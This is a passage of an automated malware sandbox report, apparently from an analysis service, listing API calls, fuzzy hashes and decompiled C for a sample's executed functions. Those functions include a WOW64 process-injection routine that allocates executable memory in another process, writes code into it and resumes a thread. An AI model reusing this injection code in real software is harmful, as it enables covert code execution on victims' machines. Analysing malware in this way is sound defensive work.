                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                          • String ID:
                                          • API String ID: 1539411459-0
                                          • Opcode ID: d517eacb8bd03658a9d5706bbf1c21a6e2641f180b1eaccd84302b1f685bff8e
                                          • Instruction ID: dd3188fa3ce0dd1c6b7a272f0bb352f82b77b2ab383b55ec6b4106943fc2407d
                                          • Opcode Fuzzy Hash: d517eacb8bd03658a9d5706bbf1c21a6e2641f180b1eaccd84302b1f685bff8e
                                          • Instruction Fuzzy Hash: 9DF09A32401659BBDB126F56AC0EFCE3F98AF06310F444010FA12310E287B40668CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 00DB2231
                                          • SetTextColor.GDI32(?,000000FF), ref: 00DB223B
                                          • SetBkMode.GDI32(?,00000001), ref: 00DB2250
                                          • GetStockObject.GDI32(00000005), ref: 00DB2258
                                          • GetWindowDC.USER32(?,00000000), ref: 00DEBE83
                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 00DEBE90
                                          • GetPixel.GDI32(00000000,?,00000000), ref: 00DEBEA9
                                          • GetPixel.GDI32(00000000,00000000,?), ref: 00DEBEC2
                                          • GetPixel.GDI32(00000000,?,?), ref: 00DEBEE2
                                          • ReleaseDC.USER32 ref: 00DEBEED
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                          • String ID:
                                          • API String ID: 1946975507-0
                                          • Opcode ID: c417bbbe860becfd8a27870396a40e401773d53376007a4d4ae811e6cfd7626f
                                          • Instruction ID: 2bd5ed2d73af338fc4d4df2e90868587fe93fefccab3c14396b2f6c9b13881ce
                                          • Opcode Fuzzy Hash: c417bbbe860becfd8a27870396a40e401773d53376007a4d4ae811e6cfd7626f
                                          • Instruction Fuzzy Hash: BEE03032504148FEDF215F65FC0D7D83F10EB05332F048366FA69580E187714984DB21
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2291192146
                                          • Opcode ID: 53484d44f5cc168a0bc603807b1a7d0cbafa30cc68043e47fdde60878434ca1b
                                          • Instruction ID: c382f7c67ae6856cc5ee0552994e37b6f1ea386dd1c4bed14990182c2b5f87cc
                                          • Opcode Fuzzy Hash: 53484d44f5cc168a0bc603807b1a7d0cbafa30cc68043e47fdde60878434ca1b
                                          • Instruction Fuzzy Hash: FEB17F71904109DBCF14EF98C885AFEB7B5EF44310F184126E947A7295DB38DA85CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DB4F0B: __fread_nolock.LIBCMT ref: 00DB4F29
                                          • _wcscmp.LIBCMT ref: 00E19824
                                          • _wcscmp.LIBCMT ref: 00E19837
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: fccbfb1d780ee278d524f0c50c6f02bc8038c8928150de46029d84e65d431fd8
                                          • Instruction ID: 43df82c80ea62c71210eaa1d57ff1c013b764ad20676c6dbd27769a791fec578
                                          • Opcode Fuzzy Hash: fccbfb1d780ee278d524f0c50c6f02bc8038c8928150de46029d84e65d431fd8
                                          • Instruction Fuzzy Hash: 1641B671A40209BADF24DEA0CC55FEFB7BDDF89714F00046AF905B7282DA71A9448B71
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: __fread_nolock_memmove
                                          • String ID: EA06
                                          • API String ID: 1988441806-3962188686
                                          • Opcode ID: 6f5488172b0f4d002fa699eccfef2b34856d5128dcf497491ee53e6c222c4de6
                                          • Instruction ID: 7819d1e385ff8f1f54e715ae9d221dd930eca8d7566608b048796b53ba39a0ea
                                          • Opcode Fuzzy Hash: 6f5488172b0f4d002fa699eccfef2b34856d5128dcf497491ee53e6c222c4de6
                                          • Instruction Fuzzy Hash: 4601B9719042187EDB18CAA8D856EEE7BFCDB15311F00459FF552D2281E975E6148B70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00DEB314: _memset.LIBCMT ref: 00DEB321
                                            • Part of subcall function 00DD0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DEB2F0,?,?,?,00DB100A), ref: 00DD0945
                                          • IsDebuggerPresent.KERNEL32(?,?,?,00DB100A), ref: 00DEB2F4
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DB100A), ref: 00DEB303
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DEB2FE
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: fe78c07016c6dfe6dc9002db027e829daa392a8169423ab683e3473d18a21af0
                                          • Instruction ID: 9612dc2c697d8e0e0f1d5487630f9d90c8660f7f454e26b3b7ceb1d9fb38d76c
                                          • Opcode Fuzzy Hash: fe78c07016c6dfe6dc9002db027e829daa392a8169423ab683e3473d18a21af0
                                          • Instruction Fuzzy Hash: 6CE039706007418ED721AF2AD50A3477AE8EF01714F04892EE886D6661EBB4E448CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 88%
                                          			E00AB3509(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				short _v16;
                                          				unsigned int _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v36;
                                          				intOrPtr _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				char _v52;
                                          				char _v92;
                                          				char _v100;
                                          				_Unknown_base(*)()* _t86;
                                          				intOrPtr* _t87;
                                          				void* _t91;
                                          				void* _t92;
                                          				intOrPtr _t97;
                                          				intOrPtr _t99;
                                          				char _t103;
                                          				intOrPtr* _t104;
                                          				intOrPtr _t106;
                                          				intOrPtr _t116;
                                          				unsigned int _t117;
                                          				char* _t119;
                                          				char* _t122;
                                          				unsigned int _t123;
                                          				intOrPtr* _t129;
                                          				unsigned int _t131;
                                          				intOrPtr _t132;
                                          				intOrPtr _t135;
                                          				intOrPtr _t136;
                                          				intOrPtr _t137;
                                          				signed int _t139;
                                          				char* _t140;
                                          				void* _t142;
                                          				void* _t144;
                                          				void* _t145;
                                          				void* _t146;
                                          				void* _t147;
                                          
                                          				_t122 = 0;
                                          				_v16 = 0;
                                          				_t140 = 0;
                                          				_t86 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "ZwWow64QueryInformationProcess64");
                                          				if(_t86 == 0) {
                                          					L27:
                                          					_t87 = _a16;
                                          					if(_t87 != 0) {
                                          						 *_t87 = _t140;
                                          					}
                                          					if(_t140 <= _a12) {
                                          						_t122 =  !=  ? 1 : _t122;
                                          					}
                                          					return _t122;
                                          				}
                                          				_t91 =  *_t86(_a4, 0,  &_v100, 0x30,  &_v12); // executed
                                          				if(_t91 < 0) {
                                          					goto L27;
                                          				}
                                          				_t92 = E00AB1490(0x200);
                                          				_v24 = _t92;
                                          				if(_t92 == 0) {
                                          					goto L27;
                                          				}
                                          				_t142 = E00AB1490(0x100);
                                          				_v36 = _t142;
                                          				if(_t142 == 0) {
                                          					L24:
                                          					LocalFree(_v24);
                                          					if(_t142 != 0) {
                                          						LocalFree(_t142);
                                          					}
                                          					goto L27;
                                          				}
                                          				_t97 = E00AB31D4( &_v100, _a4,  &_v92, _t142, 0x28); // executed
                                          				_t146 = _t145 + 0x10;
                                          				_v12 = _t97;
                                          				if(_t97 == 0) {
                                          					goto L24;
                                          				}
                                          				_t10 = _t142 + 0x28; // 0x28
                                          				_t11 = _t142 + 0x18; // 0x18
                                          				_t99 = E00AB31D4(_t11, _a4, _t11, _t10, 0x40); // executed
                                          				_t147 = _t146 + 0x10;
                                          				_v12 = _t99;
                                          				if(_t99 == 0) {
                                          					goto L24;
                                          				}
                                          				_t135 =  *((intOrPtr*)(_t142 + 0x3c));
                                          				_v28 =  *((intOrPtr*)(_t142 + 0x18)) + 0x10;
                                          				asm("adc eax, ebx");
                                          				_v48 = _t135;
                                          				_v32 =  *((intOrPtr*)(_t142 + 0x1c));
                                          				_t128 = _a8 + 8;
                                          				_t103 =  *((intOrPtr*)(_t142 + 0x38));
                                          				_v52 = _t103;
                                          				_t140 = 4;
                                          				_v8 = _a8 + 8;
                                          				if(_t103 != _v28 || _t135 != _v32) {
                                          					_t26 = _t142 + 0x68; // 0x68
                                          					_t104 = _t26;
                                          					while(1) {
                                          						_t106 = E00AB31D4(_t128, _a4,  &_v52, _t104, 0x98); // executed
                                          						_t147 = _t147 + 0x10;
                                          						_v12 = _t106;
                                          						if(_t106 == 0) {
                                          							goto L22;
                                          						}
                                          						_t30 = _t142 + 0x68; // 0x68
                                          						_t104 = _t30;
                                          						_t140 = _t140 + 0x120;
                                          						_t128 =  *_t104;
                                          						_t136 =  *((intOrPtr*)(_t104 + 4));
                                          						_v40 = _t128;
                                          						_v52 = _t128;
                                          						_v44 = _t136;
                                          						_v48 = _t136;
                                          						if(_t140 > _a12) {
                                          							L20:
                                          							if(_t128 != _v28 || _t136 != _v32) {
                                          								continue;
                                          							} else {
                                          								goto L22;
                                          							}
                                          						}
                                          						_t137 = _v8;
                                          						_t131 = ( *(_t142 + 0xb0) & 0x0000ffff) >> 1;
                                          						 *((short*)(_t137 + 0x18)) = _v16;
                                          						 *((intOrPtr*)(_t137 + 0x14)) =  *((intOrPtr*)(_t142 + 0xd0));
                                          						 *((short*)(_t137 + 0x1c)) =  *((intOrPtr*)(_t142 + 0xd4));
                                          						 *((intOrPtr*)(_t137 + 0x10)) =  *((intOrPtr*)(_t142 + 0xa8));
                                          						 *((intOrPtr*)(_t137 + 8)) =  *((intOrPtr*)(_t142 + 0x98));
                                          						_v20 = _t131;
                                          						 *((intOrPtr*)(_t137 + 0xc)) =  *((intOrPtr*)(_t142 + 0x9c));
                                          						if(_t131 >= 0x100) {
                                          							L19:
                                          							_t128 = _v40;
                                          							_t73 = _t142 + 0x68; // 0x68
                                          							_t104 = _t73;
                                          							_v16 = _v16 + 1;
                                          							_v8 = _t137 + 0x120;
                                          							_t136 = _v44;
                                          							goto L20;
                                          						}
                                          						_t54 = _t142 + 0xb8; // 0xb8
                                          						_t116 = E00AB31D4(_t131, _a4, _t54, _v24,  *(_t142 + 0xb0) & 0x0000ffff); // executed
                                          						_t147 = _t147 + 0x10;
                                          						_v12 = _t116;
                                          						if(_t116 == 0) {
                                          							_t137 = _v8;
                                          							goto L19;
                                          						}
                                          						_t117 = _v20;
                                          						_t139 = _t122;
                                          						_t132 = _v8;
                                          						if(_t117 == 0) {
                                          							L17:
                                          							(_t132 + 0x20)[_t117] = _t122;
                                          							_t68 = _t132 + 0x20; // 0x20
                                          							_t119 = StrRChrA(_t68, _t122, 0x5c); // executed
                                          							_t137 = _v8;
                                          							 *((short*)(_t137 + 0x1e)) =  &(_t119[0xffe1 - _t137]);
                                          							goto L19;
                                          						}
                                          						_t144 = _v24;
                                          						_t123 = _t117;
                                          						do {
                                          							(_t132 + 0x20)[_t139] =  *((intOrPtr*)(_t144 + _t139 * 2));
                                          							_t139 = _t139 + 1;
                                          						} while (_t139 < _t123);
                                          						_t142 = _v36;
                                          						_t122 = 0;
                                          						_t117 = _v20;
                                          						goto L17;
                                          					}
                                          					goto L22;
                                          				} else {
                                          					L22:
                                          					_t129 = _a8;
                                          					if(_t129 != 0) {
                                          						 *_t129 = _v16;
                                          					}
                                          					goto L24;
                                          				}
                                          			}
                                          0x00ab36d7
                                          0x00ab36dd
                                          0x00ab36e9
                                          0x00000000
                                          0x00ab36e9
                                          0x00ab36b3
                                          0x00ab36b6
                                          0x00ab36b8
                                          0x00ab36bb
                                          0x00ab36bf
                                          0x00ab36c0
                                          0x00ab36c4
                                          0x00ab36c7
                                          0x00ab36c9
                                          0x00000000
                                          0x00ab36c9
                                          0x00000000
                                          0x00ab3719
                                          0x00ab3719
                                          0x00ab3719
                                          0x00ab371e
                                          0x00ab3723
                                          0x00ab3723
                                          0x00000000
                                          0x00ab371e

                                          APIs
                                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,00000000,00000002,00000000,NTDLL.DLL,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB351D
                                          • GetProcAddress.KERNEL32(00000000,ZwWow64QueryInformationProcess64), ref: 00AB3529
                                          • NtWow64QueryInformationProcess64.NTDLL(00000008,00000000,00000030,00000030,00000008,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3545
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • StrRChrA.KERNELBASE(00000020,00000000,0000005C), ref: 00AB36D7
                                          • LocalFree.KERNEL32(?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D,00000000), ref: 00AB3728
                                          • LocalFree.KERNEL32(00000000,?,00000100,00000000,00000200,?,?,?,00AB2A77,?,?,?,?,00AB5468,00000028,00AB328D), ref: 00AB3732
                                            • Part of subcall function 00AB31D4: GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028,00000100,00000000,00000200), ref: 00AB31F8
                                            • Part of subcall function 00AB31D4: GetProcAddress.KERNEL32(00000000), ref: 00AB31FF
                                            • Part of subcall function 00AB31D4: NtWow64ReadVirtualMemory64.NTDLL(00000028,00000000,?,?,00000008,00000000,00000028,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028), ref: 00AB3227
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Local$AddressFreeHandleModuleProcWow64$AllocInformationMemory64Process64QueryReadVirtual
                                          • String ID: NTDLL.DLL$ZwWow64QueryInformationProcess64
                                          • API String ID: 3048855126-3633144524
                                          • Opcode ID: 14937207c767dc1e052bdd796c0af215a2b5293c47caea790e81be2ed1822498
                                          • Instruction ID: 19651c1a7b18cea93f892297ba62cdb16f779ac78f1d06829bfbd4a2649ec7dc
                                          • Opcode Fuzzy Hash: 14937207c767dc1e052bdd796c0af215a2b5293c47caea790e81be2ed1822498
                                          • Instruction Fuzzy Hash: 127121B1E00605AFDF14DFA9C881AEEB7F9FF48340F144569E945A7252EB30EA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E00AB3383(void* __ecx, intOrPtr __edx) {
                                          				intOrPtr _v8;
                                          				void* _v16;
                                          				intOrPtr* _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				long _v32;
                                          				void* _v1024;
                                          				void _v1028;
                                          				intOrPtr _v1152;
                                          				void* _v1156;
                                          				intOrPtr _v1228;
                                          				void _v1276;
                                          				intOrPtr* _t44;
                                          				void* _t47;
                                          				void* _t50;
                                          				intOrPtr* _t53;
                                          				int _t59;
                                          				void* _t60;
                                          				intOrPtr _t63;
                                          				void* _t69;
                                          				intOrPtr _t72;
                                          				intOrPtr _t74;
                                          				void* _t75;
                                          				void* _t77;
                                          				void** _t79;
                                          				long _t81;
                                          				void* _t87;
                                          
                                          				_t74 = __edx;
                                          				_t69 = _t87;
                                          				_v8 =  *((intOrPtr*)(_t69 + 4));
                                          				_t81 = 0;
                                          				memset( &_v1276, 0, 0x4d0);
                                          				_t44 = E00AB3255(_t74);
                                          				_t77 =  *(_t69 + 0xc);
                                          				_v20 = _t44;
                                          				_v1228 = 0x100003;
                                          				memcpy(_t77 + 0x218, E00AB37D1, 0x100);
                                          				_t47 = VirtualAllocEx( *( *(_t69 + 8)), 0, 0x318, 0x3000, 0x40); // executed
                                          				_v16 = _t47;
                                          				if(_t47 == 0) {
                                          					L10:
                                          					_t81 = GetLastError();
                                          					L11:
                                          					return _t81;
                                          				}
                                          				_t50 =  &_v1276;
                                          				asm("cdq");
                                          				_t72 = _t74;
                                          				_v28 = _t50;
                                          				_push(_t72);
                                          				_push(_t50);
                                          				_v24 = _t72;
                                          				asm("cdq");
                                          				_push(_t74);
                                          				_push(( *(_t69 + 8))[1]);
                                          				_t53 = _v20;
                                          				_push(0);
                                          				_push(2);
                                          				_push( *((intOrPtr*)(_t53 + 4)));
                                          				_push( *_t53);
                                          				if(E00AB3760() >= 0) {
                                          					asm("cdq");
                                          					if( *((intOrPtr*)(_t77 + 0x10)) != _t77 + 0x18) {
                                          						_t75 = _v16;
                                          					} else {
                                          						_t75 = _v16;
                                          						if( *((intOrPtr*)(_t77 + 0x14)) == _t74) {
                                          							 *((intOrPtr*)(_t77 + 0x10)) = _t75 + 0x18;
                                          							asm("adc ecx, esi");
                                          							 *((intOrPtr*)(_t77 + 0x14)) = 0;
                                          						}
                                          					}
                                          					 *_t77 = _v1028;
                                          					 *((intOrPtr*)(_t77 + 4)) = _v1024;
                                          					_t79 =  *(_t69 + 8);
                                          					_t59 = WriteProcessMemory( *_t79, _t75, _t77, 0x318,  &_v32); // executed
                                          					if(_t59 == 0) {
                                          						goto L10;
                                          					} else {
                                          						_t60 = _v16;
                                          						_push(_v24);
                                          						_v1156 = _t60;
                                          						_push(_v28);
                                          						asm("cdq");
                                          						_v1028 = _t60 + 0x218;
                                          						_v1024 = _t75;
                                          						asm("cdq");
                                          						_push(_t75);
                                          						_push(_t79[1]);
                                          						_t63 = _v20;
                                          						_push(_t81);
                                          						_v1152 = _t81;
                                          						_push(2);
                                          						_push( *((intOrPtr*)(_t63 + 0xc)));
                                          						_push( *((intOrPtr*)(_t63 + 8)));
                                          						if(E00AB3760() < 0) {
                                          							goto L2;
                                          						}
                                          						ResumeThread(_t79[1]); // executed
                                          						Sleep(0x1f4); // executed
                                          						SuspendThread(_t79[1]); // executed
                                          						goto L11;
                                          					}
                                          				}
                                          				L2:
                                          				_t81 = 5;
                                          				goto L11;
                                          			}

                                          APIs
                                          • memset.NTDLL ref: 00AB33AF
                                            • Part of subcall function 00AB3255: GetCurrentProcessId.KERNEL32(00000008,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3267
                                            • Part of subcall function 00AB3255: OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00AB33B9,?,00000000,000004D0,00000008,00000000), ref: 00AB3274
                                            • Part of subcall function 00AB3255: FindCloseChangeNotification.KERNELBASE(00000000,000004D0,00000008,00000000), ref: 00AB32C3
                                          • memcpy.NTDLL(?,00AB37D1,00000100,?,00000000,000004D0,00000008,00000000), ref: 00AB33DA
                                          • VirtualAllocEx.KERNELBASE(?,00000000,00000318,00003000,00000040,?,?,?,?,00000008,00000000), ref: 00AB33F4
                                          • WriteProcessMemory.KERNELBASE(?,?,?,00000318,?), ref: 00AB3484
                                          • ResumeThread.KERNELBASE(?), ref: 00AB34DA
                                          • Sleep.KERNELBASE(000001F4), ref: 00AB34E5
                                          • SuspendThread.KERNELBASE(?), ref: 00AB34EE
                                          • GetLastError.KERNEL32(?,?,?,?,00000008,00000000), ref: 00AB34F6
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$Thread$AllocChangeCloseCurrentErrorFindLastMemoryNotificationOpenResumeSleepSuspendVirtualWritememcpymemset
                                          • String ID:
                                          • API String ID: 1767431710-0
                                          • Opcode ID: b04e71875e34ee69945bffd4408bd931693011cb4202cd5cb5e4ce21b3f210fc
                                          • Instruction ID: c6f678735315626b65efa1793d7418eb5380e96b446e65dd973fda83e6361bd9
                                          • Opcode Fuzzy Hash: b04e71875e34ee69945bffd4408bd931693011cb4202cd5cb5e4ce21b3f210fc
                                          • Instruction Fuzzy Hash: EE4181B1940216AFDB11DF69CD45ADABBB8FF08711F0441A5F90897262D770AA50CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 40%
                                          			E00AB31D4(void* __ecx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				void _v12;
                                          				intOrPtr* _t9;
                                          				_Unknown_base(*)()* _t15;
                                          				void* _t17;
                                          
                                          				_t15 =  *0xb16d7c;
                                          				asm("xorps xmm0, xmm0");
                                          				_t17 = 0;
                                          				asm("movlpd [ebp-0x8], xmm0");
                                          				if(_t15 != 0) {
                                          					L2:
                                          					_t9 = _a8;
                                          					 *_t15(_a4,  *_t9,  *((intOrPtr*)(_t9 + 4)), _a12, _a16, _t17,  &_v12); // executed
                                          					_t17 =  >=  ? _v12 : _t17;
                                          				} else {
                                          					_t15 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "ZwWow64ReadVirtualMemory64");
                                          					 *0xb16d7c = _t15;
                                          					if(_t15 != 0) {
                                          						goto L2;
                                          					}
                                          				}
                                          				return _t17;
                                          			}

                                          APIs
                                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64ReadVirtualMemory64,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028,00000100,00000000,00000200), ref: 00AB31F8
                                          • GetProcAddress.KERNEL32(00000000), ref: 00AB31FF
                                          • NtWow64ReadVirtualMemory64.NTDLL(00000028,00000000,?,?,00000008,00000000,00000028,00000000,?,?,?,00AB358B,00000008,?,00000000,00000028), ref: 00AB3227
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleMemory64ModuleProcReadVirtualWow64
                                          • String ID: NTDLL.DLL$ZwWow64ReadVirtualMemory64
                                          • API String ID: 148456037-3377366912
                                          • Opcode ID: 3cc836033bf5417a5fe39becdf5ad060ce2ee37cd81d5966cc351eaf3dd5635b
                                          • Instruction ID: cf6c6ef32093cf1c252cbc55c428d379515f34fee7e0d75b55bfe39af5fee163
                                          • Opcode Fuzzy Hash: 3cc836033bf5417a5fe39becdf5ad060ce2ee37cd81d5966cc351eaf3dd5635b
                                          • Instruction Fuzzy Hash: 0FF04936A00619BFCF099FA9EC04EDA7BBDEF0D314B008269F904E3121E73199508B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00AB318A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				_Unknown_base(*)()* _t6;
                                          				void* _t7;
                                          				void* _t10;
                                          
                                          				_t6 =  *0xb16d80;
                                          				_t10 = 0xc0000002;
                                          				if(_t6 != 0) {
                                          					L2:
                                          					_t7 =  *_t6(_a4, _a8, _a12, _a16, _a20); // executed
                                          					_t10 = _t7;
                                          				} else {
                                          					_t6 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "ZwWow64QueryInformationProcess64");
                                          					 *0xb16d80 = _t6;
                                          					if(_t6 != 0) {
                                          						goto L2;
                                          					}
                                          				}
                                          				return _t10;
                                          			}

                                          APIs
                                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,ZwWow64QueryInformationProcess64,00000000,?,00AB2BC3,?,00000000,?,00000030,?,00000000,00000000), ref: 00AB31A6
                                          • GetProcAddress.KERNEL32(00000000), ref: 00AB31AD
                                          • NtWow64QueryInformationProcess64.NTDLL(00000000,?,00000030,?,00000000,00000000,?,00AB2BC3,?,00000000,?,00000030,?,00000000,00000000), ref: 00AB31CB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleInformationModuleProcProcess64QueryWow64
                                          • String ID: NTDLL.DLL$ZwWow64QueryInformationProcess64
                                          • API String ID: 782493824-3633144524
                                          • Opcode ID: ff09bd33ec4f608eb7981c64b475d8849f9fa0eb7abd77a2820330c4b562aed0
                                          • Instruction ID: 7e31a19c9f13575dd49739edb1adbbf6d6d0ce8e6e88c07c6b0133a5a8a85304
                                          • Opcode Fuzzy Hash: ff09bd33ec4f608eb7981c64b475d8849f9fa0eb7abd77a2820330c4b562aed0
                                          • Instruction Fuzzy Hash: D5E0ED32600615AFCF02AFECAC09ADA3BADBB08755B444120FA08D6122D731CD219B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

